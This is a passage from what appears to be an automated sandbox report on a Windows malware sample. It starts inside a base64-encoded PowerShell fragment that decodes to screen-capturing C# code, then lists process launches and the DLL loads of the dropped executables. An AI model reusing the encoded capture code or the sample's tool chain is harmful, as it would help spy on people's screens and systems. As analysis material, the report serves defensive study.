cAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: libffi-7.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: libcrypto-1_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: libssl-1_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
